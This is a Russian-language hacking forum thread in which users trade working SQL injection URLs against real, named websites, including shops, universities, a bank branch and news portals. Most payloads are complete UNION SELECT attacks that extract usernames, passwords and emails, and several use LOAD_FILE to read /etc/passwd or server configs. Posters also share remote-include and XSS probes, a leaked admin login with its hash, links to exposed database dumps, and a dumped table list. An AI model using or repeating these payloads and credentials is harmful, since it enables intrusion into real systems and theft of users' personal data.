Постим здесь скуль инъекции! Флейм/оффтоп будет жестоко удаляться + будет испорчена репа.
Перед тем как запостить инъекцию, проверьте не выкладывалась ли она ранее:

========> АНТИБОЯН (http://www.google.com) <========

Вбиваем site:forum.antichat.ru "СЮДА СВОЮ СКУЛЬ" и жмём эту кнопочку. Всё просто!!!

Попробуй, тебе понравится!!!

--------------------------------------------------------------------------------------------------------------

Правила этой темы:

1.

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.
При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.


Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок.

2.

Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.

3.

По причине участившихся дефейсов принято решение не публиковать в теме пароли и хеши к админкам

Они будут удаляться, а нарушители наказываться

Как увидел тему, сразу захотелось стать ПервоНахом. Думал, где искать скули и на ум почему-то пришли только они - ПИДОРЫ. гыггыг
Итог: http://www.gaycentral.ru/news/?id=30'
Правда дальше не копался.
Думаю, что будет удобно новичкам, так как виден полный текст запроса.
Дальше, снизу было написано Made by KAMOV Media (gayly.ru)
После чего было найдено http://www.gayly.ru/news/archive/?year=2'005&month=12 аналогично.
АнтиПидорсОфАнтичат. ;)
P.S. Монстер, с тебя простава мне, как первонаху.... гыгыгыгг

_http://csmania.ru/modules.php?name=Articles&pa=showarticle&articles_id=8'
Улыбнуло -)

ht~tp://www.patrickharviemsp.com/index.php?page=news.php&story=49%20union%20select%201,2,3,4,5/*

TV-CLUB.RU(его рекламу по Ren-TV крутят)


_http://tv-club.ru/catalog.php?id=-7+union+select+name+from+users+where+id=user_id/*

_http://tv-club.ru/catalog.php?id=-7+union+select+password+from+users+where+id=user_i d/*

_http://tv-club.ru/catalog.php?id=-7+union+select+email+from+users+where+id=user_id/*

_http://www.mediaprovinces.kz/index.php?r=8c=174'9

_http://ganjubass.com/info.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35/* (вобще сайт сам одна большая скуль)

_http://www.lion.kz/show_news.php?id=872%27

_http://livestats.micromir.com/view.php?order=ip&pg=5'

http://cs-maps.org/index.php?page=maplist.php&type=dm&source=N&sort=date'&pageno=1
мои пять копеек :)

_http://www.fitness.ru/clubs/timetable.phtml?ClubID=17'

_http://www.zapaxa.net/?act=detail&id=23'3

_http://www.elabuga.ru/virt1.phtml?rait=7&cat=1'3

_http://www.fitness.ru/clubs/timetable.phtml?ClubID=1'7

_http://www.0577.ru/imode/south/?winers=33'

_http://parnas.baltika.ru/forum/?rand=35191&fold_id=14&forumid=1'

_http://gsmfilm.ru/page.php?page=-102+union+select+111,222,333/*

_http://avtostarter.com/obzor.php?page=1'

Для тех, кому не по душе клубик ЦСКА. ;)
http://www.peski.ru/gbook/find/index.php?nik=88&pr1=%3E%3D&d1=16&m1=07&y1=2006&pr2=%3C%3D&d2=23&m2=07&y2=2006&invis=1&mess=88'/*&mail=88&ipf=88&sort=0
Правда не получилось даже кол-во столбцов подобрать - до 30и пробовал примерно и заипался. Там еще где-то скуль-инж была, но не помню где уже.

http://www.swadba.by/include.php?dir=http://
http://www.4webhelp.net/tutorials/?cid=9%20union%20select%20user_password,2,3,4,5,6% 20from%20users/*-
http://www.driftscenter.dk/page.php?emne_id=3%20union%20select%201,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7/*-
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from% 20users%20where%20nick=admin%2527/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email ,555,666,777,888,999%20from%20user%20limit%201000/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7 ,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_member s/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from% 20users%20limit%203,4/*
http://www.nhia.edu/news.php?id=13%20union%20select%201,2,3,4,5,6,7,8, 9,0,1,2,3,4,5/*-
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,usern ame,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,load_file('/etc/passwd'),4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20 111,222%20from%20affiliates/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,e mail,password%20from%20users/*-
http://www.greenshift.com/news.php?id=5555555555%20union%20select%201,2,user ,4,password,6,7,8,9,0,1,2%20from%20mysql.user%20li mit%203,4/*
http://www.jerusalemfoundation.org/news.php?id=-143%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5/*
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.bendruomenes.lt/news.php?id=9999999999%20union%20select%201,2,user name,4,5,password,7,8,9,0%20from%20users%20limit%2 010,15/*
http://www.dadcomehome.org/en/news.php?id=9999999999%20union%20select%201,2,3,4, Password,6,7,8,9,0,1,2,3,4%20from%20mysql.user/*
http://www.thestra.com/news.php?type=article&id=93%20union%20select%200,0,password,0,0%20from%2 0mysql.user/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0%20from %20users/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from %20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8, 9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9, 1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,user, password,4,5,6,7,8,9,0,1,2%20from%20mysql.user/*
http://insolution.at/news.php?id=../../../../../etc/passwd
http://www.pixelvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20 from%20mysql.user/*
http://www.dslvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20 from%20mysql.user/*
http://smartphone.to.pl/news.php?id=55555555%20union%20select%201,parol,3, 4,5,6,7%20from%20user/*
http://www.depot.com.ar/chat/web/admin/extentions.php
http://www.evergreencc.com/calendar/payment.php?insPath=http://

Вот красивый сайтик, но....

_http://bknt.ru/library/?cat=2609\'/*иid=1916

З.Ы.: Кому не лень почитайте статейку без \'/* - познавательно! =)

Я на шел вот странички
cvs.php.net/viewcvs.cgi/php-master-web/users.sql
wiki.cs.cityu.edu.hk/src/users.sql
Можно ли, что-нибудь с ними сделать

_http://www.dreamtech.ru/Kino/CardView.phtml?id=-1 union select 1,2,3,4/*

_http://www.sibdosug.com/details.php?id=310'
Я там так и не смог подобрать число столбцов(((
А по идеи весь этот сайт полная sql-inj

давно я сюда не заходил...

_http://porto.com.ua/?pg=catalog

давно я сюда не заходил...

_http://porto.com.ua/?pg=catalog
А в чем смысл этой ошибки, если не секрет? Где здесь скуль-инж? Как его применить?

http://www.calibra-club.ru/profileclub.php?mode=viewprofile&u=17'
Правда дальше раскопать не получилось. Такое чувство, что это не скуль, а подстава.

http://test.acunetix.com/artists.php?artist=3333 union select 111,222,333/*-
Так просто разберался со сканером, вот решил посмотреть что они предлагают для тестирования)))

2podkashey http://porto.com.ua/?pg=phpinfo =)

Два провайдера:
http://medialite-net.ru/about\'

http://sknt.ru
В cookies: KEngineSession: \' union select 1,2,3,4,5/*

la2info.ru

_http://la2info.ru/db.php?action=npcs(АМПЕРСАНД)npcid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*

P.S. с амперсандом фигня какая-то, не отображается.

http://www.supercomputingonline.com/article.php?sid=2252
http://www.worthplaying.com/article.php?sid=31196
http://www.gamingreport.com/article.php?sid=21543

Go0o$E

Вот тебе база http://medialite-net.ru , _http://emiq.nm.ru/bacup.sql качай )))

SQL injection на injection.ru =))

_http://injection.ru/?id=-1 union select 1,2,3,4,5,6,7,8,9/*

Go0o$E

Вот тебе база http://medialite-net.ru , _http://emiq.nm.ru/bacup.sql качай )))

Написал бы как скачал сразу =))

install/upgrade.php
install/upgrade_301.php?step=\'

epidem.ru


http://epidem.ru/modules.php?name=News&pagenum=\'

http://epidem.ru/modules.php?name=News&pagenum=\'
server version for the right syntax to use near '-10, 10' at line 1
ИМХО скуль в LIMIT находится, смысла поэтому в нем не много. ;)

Для тех кто хочет покопаться в Postgresql:
http://club.veresk.ru/?part_id=18-1%20union%20select%20version()

Вот нашел:
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,555/*

После 20 мин получилось вот такое )) :
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,CONCAT('ID=',id,'%2 0Login=',Login,'%20Passord=',password,'%20Mail=',% 20email,'%20ICQ=',icq)+from+users/*

Может, кто захочет дальше поковырять.

sql иньекция в сбербанке )

http://www.vsb.vrn.ru/vbank/branches.asp?bk=1%20UNION%20SSS

Sql на www.territory.ru

POST http://www.territory.ru/info/news/index.php?show=cat&id=0 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.territory.ru
Content-Length: 57
Connection: Close
Pragma: no-cache

show=login&login='&password=123email@123.com

2 Tem
Если сможешь тут слить базу, ОЧЕНЬ буду признателен, если скинешь ее и мне. 8)

https://secure.mysociety.org/ cvstrac/getfile/mysociety/twfy/db/users.sql

home.southernct.edu/~dorrt1/work/lablog/admins.sql

members.home.nl/j.fridzema/database.sql

Вот, поднакопилось.http://www.4webhelp.net/tutorials/?cid=9%20union%20select%201,2,user_password,4,5,6% 20from%20users/*
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from% 20users/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email ,555,666,777,888,999%20from%20user/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7 ,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_member s/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from% 20users%20limit%203,4/*
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,usern ame,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,3,4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20 111,222/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,e mail,password%20from%20users/*-
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from %20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8, 9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9, 1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,22,33 ,4,5,6,7,8,9,0,1,2/*

вот еще одна
http://albatros.uz/index.php?option=content&task=view&id=6&Itemid=30'

а вот на wap.wab.ru
при отправке письма выдает:
Ошибка при отправке письма! Попробуйте еще раз.
ERROR You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'Юзернейм')and(idtowhom = '515488')and(topic = ''') limit 1' at lin

Вот нашел только вот толку маловато наверно, так как я не могу найти таблицу users
_http://www.yuretz.ru/prikol.php?id=470+union+select+0,1,2,3,4,5,6,7,8,9 ,10,11/*

http://www.alparysoft.ru/products.php?id=10&item=-1'

_http://www.flirtanica.ru/articles1.php?id=35'

Не могу найти количество полей...... Пошел по другому пути и тут проблемы....
Пробуйте мож у кого получиться... если получиться отпишись!
http://artflash.guelman.ru/profile.php?l=ru&id=-1'%20or%20password!=uname%20or%20id='-1

_http://www.flirtanica.ru/articles1.php?id=35'
http://www.flirtanica.ru/articles1.php?id=-10+union+select+1,adres,3,4,price+from+party+where +id=264/*
а во втором разве есть скуль? ошибка где ?

Ошибка не отображается, но она есть...
Она обрабатывается самим php

http://www.zooclub.ru/indexr.php?id=4'

http://www.gelezo.net/files.php?id=-1'

у кого получится ковырнуть дальше, скиньте плз примеры в ПМ
PostgreSQL 7.3.4 on i386-portbld-freebsd4.8, compiled by GCC 2.95.4

_http://www.littlegirl.tv/cgi-bin/message.cgi?p=-19+UNION+SELECT+1,'2',tablename+from+pg_tables+whe re+tablename+not+in+('agency_banner_click','agency _mst','campaign','domain','domain2','errmsg_mst',' errmsg_mst','errmsg_mst','mail_template','nyukin', 'option','pg_aggregate','pg_am','pg_amop','pg_ampr oc','pg_attrdef','pg_attribute','pg_cast','pg_clas s','pg_conversion')--

_http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,username,user_password+from+p hpbb_users+where+user_level=1

http://www.neotstoy.ru/?news&read=-44fc2de67f249'%20union%20select%201,2,3,'user',5,6 ,7,8,9,10,11%20/*
банально хз чё дальше с ним делать)

http://j-a.ru/galleryvech.php?name_gall=1'

http://www.saworship.com/article-page.php?ID=-2875

39 columns

Вот SQL-injection на государственном Универе

http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=2793'

http://www.grovesinternet.com/stormtrack/product.asp?categoryid=777

http://referat.com.ua/referat_show.php?id=1068325882'union+select+null,n ull,null,null,null,null,null/*

какая то хрень с кавычками
_http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,tab le_name,null,null,null,null,null,null,null,null,nu ll+from+information_schema.tables--

http://www.kazanova.com.ua/product.php?id=-296+UNION+SELECT+1,2,password,4,5,6,7,8,9,10,11,12 ,13,14+from+users/*

Вот еще одна, полноценная, пользуйтесь на здоровье
_http://www.hamptonplace.com/news/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11%20from%20admin/*

http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%20null,null,n ull,null,null,null,null,null,null,null,null,null,n ull%20/*

http://binet.com.ua/dir/index.php?cat=-1'%20UNION%20SELECT%20null,null,null,null,null,nul l,null,null,null/*

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,% 22:%22,password),10,11,12,13,14+from+mysql.user/*

А вот и рут нашелся :)

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*

Ну у меня не банк, конечно...но всё же...
_http://www.softinka.net/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms _users%20where%20level=5
(Чтобы увидеть действие скуля, надо быть зарегенным на сайте. чтобы вам полдня не копаться с регистрацией: SponSor:hacker)
/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms _users%20where%20level=5

какая то хрень с кавычками
_http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,tab le_name,null,null,null,null,null,null,null,null,nu ll+from+information_schema.tables--

http://www.galicianet.com/foros/default2.asp?IDMensaje=1 or 1=(select system_user) --

POST: http://shop.shooterscatalog.com/catalog.php?type=category&id=5125 order by 1/*

Скуль на шопе. ORDER BY не врет, но реализация не из элементарных.

База в виде
email
login:password


http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11,12,13%20from%20admin/*

etc/passwd

http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,LOAD_FILE(char(47,101,116,99,47,112,97,115,11 5,119,100)),3,4,5,6,7,8,9,10,11,12,13%20from%20adm in/*

Также в окне поиска пассивная xss

<script>alert()</script>

Скуля в параметре типа STRING из-за недостаточной фильтрации входящих символов + magic_quotes=Off

http://www.president.bg/news_archive.php?from=news'%20and(1=1)--&type=0

http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92 ,119,119,119,92,99,111,110,102,92,104,116,116,112, 100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf

_http://www.soccershop.ru/shopping/product_info.php?id=-3016+union+select+1,2,3/*
_http://www.mtas.ru/second.php?ID=-15+union+select+111/*
_http://www.transbuddha.com/mediaHolder.php?id=-1147+union+select+1,2,3,4,5,6,7/*
_http://www.ipecac.com/bio.php?id=-3+union+select+1,2,3,4/*
_http://www.rusfinclub.ru/index.php?news_id=-1846+union+select+1,2,3,4,5,6,7,8,9/*

_http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

_http://www.deseretfirstcu.org/m2m/detail.asp?car=1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+login

http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
http://newstoday.com.ua/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

Не знаю как у Вас, а у нас одна из самых распространненых станций:
radiorecord.ru/news/?id=-327%20union%20select%20USER()/*

рейтинг казино )

_http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+

_http://dosug.nu/blockcomment.htm?idblock=1'+or+'1'='1+order+by+1--

ht_tp://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,CONCAT(username,CHAR(45,62),u ser_password,CHAR(32,45,62,73,68,61,32),user_id),C ONCAT(user_email,CHAR(32,38,32),user_website)+from +phpbb_users/*

Дырку поправили :-(

-
Шеллы запрещены!
/[m0nzt3r/]

ht~tp://www.kazanova.com.ua/product.php?id=-2+UNION+SELECT+1,2,CONCAT(CHAR(64,64),user,CHAR(58 ,58),password,CHAR(58,58),name,CHAR(58,58),surname ,CHAR(58,58),id,CHAR(58,58),sex,CHAR(58,58),email, CHAR(58,58),phone,CHAR(58,58),city),4,5,5,7,8,9,1, 1,1,1,1+from+users/*
админка по адресу /admin

Весь сайт в багах.
Кто доламает отпишите в асю.
Если я 1 не буду :)


_http://zloy.org/news_f1%20union%20select%201.html

_http://zloy.org/news_f1'%20union%20select%201,2,3,4,5,6,7,8,9,1,2, 3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9, 1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7, 8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5, 6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,9,9,9, 1,2,3,4.html

http://www.chicagomediaaction.org/news.php?id=-481%20union%20select%201,2,3,4,5,6,7,8/*

http://www.multidmedia.com/news/news.php?id=-63%20union%20select%201,2,3,4,5/*

loccitane.com Все движки разные но все бажные так держать админы.

_http://www.loccitane.com.au/product/categoryList.asp?mainUsageName=FRAGRANCE&subUsageId=10%20or%201=@@version--

_http://www.loccitane.ru/category.php?id=-1+union+select+1,2,concat(login,char(58),password) ,1,5+from+users+where+id=134/*

27 столбцов=)
_http://www.standardtvandappliance.com/home/products_detail/index.php?prodid=1327%20union%20select%201,2,3,4,u ser(),6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19 ,20,21,22,23,24,25,26,27/*

А вот еще одна на этом же сайте)
http://www.standardtvandappliance.com/home/subcategory/index.php?subcatid=63%20union%20select%201,USER(), 3,4,5,6,7/*

ВОТ еще 2 инекции на сайте

www.zot.ru

http://www.zot.ru/index.php?prodid=1+and+1=8%20union%20select%201,na me,3,4,id,6,7,art,9%20from%20cat/*
и
http://www.zot.ru/action.php?id=1+and+1=1+union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13+from+cat/*


все колонки которые мне известны и всем доступны:
id,name,art,typename,descr,acti,cert,spec,status

[daily.com.ua]


http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,login+from+users/*
http://daily.com.ua/admin/index.php - админка
andrew:b9e464f282d8051b47e0e592c6f58aa2


[www.pharm-system.com]


http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,6,7,8+from+users/*

[www.khabibullin.kiev.ua]

http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+1,2/*


[www.jimdunlop.com] (смотреть исходник)

http://www.jimdunlop.com/index.php?page=products/pip&id=-1+union+select+1,2,3,4,5,6,7,8,9/*


[www.amtel.ru]

http://www.amtel.ru/page.php?id=-1+union+select+1,2,3/*

[www.hillelisrael.org.il]
http://www.hillelisrael.org.il/page.php?table=Page&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.rabidhardware.net/index.php?id=1'%20UNION%20SELECT%201,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19%20/*

http://best4her.net/shop.php?cat=-3%20union%20select%201,2,3,4,5,6,7,8,9,10,11/*&retail - online shop

http://dendro.ru/?id=-4%20union%20select%201,2,3,4,5/*

_http://www.soundnation.net/article.php?a=-140+UNION+SELECT+1,2,3,4,5,6,7/*&mod=view

http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,user(),databas e(),13,14,15,16,17,18,19,20,21,22,23/*

http://www.libraries.iub.edu/error.php?errorId=-1+union+select+1,errorid,VERSION()+from+error+wher e+errorid=1/*

если получится копнуть дальше, напишите в ПМ ;)

http://www.libraries.iub.edu/error.php?errorId=-1+union+select+1,2,char(207,229,240,229,225,232,24 0,224,233,32,234,238,235,238,237,234,232)+from+adm in/*

_http://www.bilimdon.uz/news/index.php?news_id=307'

Найденна не мной раздроченна мной :)

rambler.ru

_http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1+or+1=(SELECT+TOP+1+cast(UserI D+as+nvarchar)%2B%27%3A%27%2Bcast(UserEmail+as+nva rchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarchar)+FR OM+TUserFrame+where+userid=44)--

id с 30 до 600 примерно.

Структура:

database : SBG
TReq
vHotelData
TrCard
TBookPay
TPenalty
vHPL_117604143_7
TSubMenu
vHPL_415186118_3
vInsList
Import
vHPL_415181715_3
vHPL_924873809_3
vHPL_924884253_3
TrAgentType
vHPL_924918127_3
TExcursPL
vHPL_162626041_All
vBookPersons1
vBookPersons2
vHPL_735327103_1
vTransCar
vHPL_947446991_4
TSTBWork
TPageDetail
vHPL_162626041_5
vHPL_947446991_All
vHPL_924916560_10
vHPL_924916560_12
vHPL_924916560_11
vHPL_924916560_14
vHPL_924916560_13
vHPL_924916560_15
THotel_123
ALTERN
TrRoomAdd
TTransCar
TPayTransact
vFoodPL
vHotel2
vHotel1
TrService
TUserRekv
TIQueries
TAddPL
vAgent1
vAgent3
vTransListToHotel
vHPL_117604143_8
TrTourRegion
TrRegForm
TrLimitType
TrReclama
TYandexWork
TrTourRegionCity
TrStation
vBookAgent
vFoodPrice
vHPL_735327103_2
vRoomPrice
TSTB_Auth
TrBookStatus
TrPort
vHPL_947446991_5
vHPL_162626041_4
vHPL_924916560_6
vTransferAgent
EMailLog
vTransListFromHotel
sysconstraints
TRequestState
vHPL_889097699_5
vHPL_117604143_9
TOrdersRoom
TPortofolio
vHotelPriceList2
vBookRoomList
TBookExc
vAgent
vBookTransList
vHPL_415186118_2
vInsInfo
vHPL_415181715_2
vHPL_924873809_2
vHPL_924884253_2
vHPL_40370029_All
vHPL_924918127_2
TPaySystem
vBookRoomList2
vHPL_735327103_3
TrFoodType
vHPL_889097699_4
TBookIns
TPayment
TAccount
TRequest
TWorkEport
TrPayBasis
syssegments
TrTimeUnit
vFoodPriceList
TrRoomList
TTransList
TrRoomType
TTimer_Check
TrRegion
vHPL_415186118_1
vHPL_415181715_1
vHPL_924873809_1
vHPL_924884253_1
TMenu
TNews
TrRegion_Backup
TRate
TBook
TSpec
vHPL_924918127_1
TrCurrency
vTransListInHotel
Test
TFAQ
TRequirement
TRequestRoom
TFixedArrive
vHPL_735327103_4
TrInsType
TrEmbassy
vHPL_889097699_3
TTimer
TActionClass
vTransHotelPort
TrEmpType
vHPL_889097699_All
vTransCarBook
vHPL_947446991_1
vHPL_162626041_2
TInterfaces
vBookIns
vTransHotelStation
TTimerReq
DiscountConst
vHPl_Date2
vHPL_117604143_10
vHPL_117604143_12
vHPL_117604143_11
vHPL_117604143_14
vHPL_117604143_13
vHPL_117604143_15
TRoomReestr
TrHotelsAddServicesList
TAgentRights
TEportWork
TFixedAddPL
vFoodPriceList2
vHPL_735327103_5
TrTimerType
vHPL_415181715_All
TInsuranceList
TrRespStatus
THotel
TPayOrder
vInsuranceAgent
vHPL_947446991_2
TRequestAdd
vHPL_162626041_1
vTransList
vHPL_924916560_9
vTransListInput
vHPL_415186118_All
vHPL_924918127_All
vHPl_Date1
TQuest
TTrans
TOpros
TAgent
vHPL_924884253_All
vHPL_924873809_All
TrDocType
TrCarType
TOrderStatus
TrCountry
vTransListBookFrom
vBookInfoAgent
vHPL_40370029_1
vHPL_40370029_2
vHPL_40370029_3
vHPL_40370029_4
vHPL_40370029_5
vCarListInput
TBookPersons
TForumMessage
vBookPersonsCount
vHPL_924916560_8
vHPL_415186118_5
vHotelCodes
vTransListBookIn
vHPL_415181715_5
TrPayType
vHPL_924873809_5
vHPL_924884253_5
vHPL_924918127_5
vHPL_40273923_4
vHPL_40273923_3
vHPL_40273923_5
vHPL_40273923_2
vHPL_40273923_1
TrPenUnit
vHPL_889097699_2
TrCity
TBookAdd
TSpecList
TFoodList
dtproperties
vHPL_162626041_3
TrHotelType
vBookAgent1
THotHotel
TBookRoom
TBookFood
vBookSelect
vFoodInfo
TrSalePoint
THistoryBook
TrDistance
TrHotelsAddServices
TrAddPlace
vFoodType
TAllQueries
TOrders
vBookFood
vBookRoom
vBookInfo
TTimeLimit
TExcursion
TrReqStatus
TGroupHotel
TTypeHotel
TCarList
TBookTrans
vHPL_924916560_7
vHPL_415186118_4
vHPL_735327103_All
vHPL_415181715_4
TSpecLeft
vHPL_924873809_4

http://shkola.lv/?mode=lsntheme&themeid=-1%20union%20select%201,2,3,4,5/*
http://shkola.lv/index.php?mode=wgoods&page=uroki&lsnid=-12%20union%20select%201,2,3,4,5/*

Кто сможет что-то достать, отпишитесь в ПМ плз, а то я "недовоткнул".

forum.vbios.com
http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20UNION%20SELECT%201,2,3,4,AES_DECRYPT(AES_ENCRY PT(database(),0x71),0x71),6,7,8,9,10,11,12,13/*

gameland.ru

http://www.gameland.ru/articles2/catalog/game.asp?code=1'
ADODB.Recordset error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/articles2/catalog/game.asp, line 202

http://www.bustur.ru/t.php?id=1'

Нашел еще одну...
Гитаристы поймут ;)

http://www.tablatures.tk/tabs.php?id=-243+UNION+SELECT+111111111111111111/*&page=1

В самом верху - перед словом TABS.
Там рядом пхпбб стоит, если кто смогёт оттуда инфу выдрать, расскажите плз в ПМ об этом.

Tayle.com
http://www.tayle.com/adv.php?aid=1%20union%20select%201,2,3,4/*

XSS с него же здесь:
http://forum.antichat.ru/threadedpost212700.html#post212700

_http://www.myvzfei.ru/news_detail.asp?id=1'
кто пробьется дальше пишите в ПМ

Kitcom.ru
http://www.kitcom.ru/goods/index.php?gm=1%20union%20select%201,user,password% 20from%20mysql.user


Russobit - M
http://new.russobit-m.ru/?page=news&newsID=1 union select 1,2/*

Koss.ru
http://www.koss.ru/news.php?id=1 union select 1,2,3,4,5/*

Reviews.ru
http://www.reviews.ru/clause/article.asp?id=1'

NetLab.ru
http://netlab.ru/news/hotnews/descr.asp?id=1'

Computek.ru
http://computek.ru/docs/tpl/new.asp?id=1'

VideoSite
http://videosite.ru/docs.php?id=7%20union%20select%201,2,3,4/*


Portal-Club.com

http://www.portal-club.com/main.php?id=1%20union%20select%201,2/*


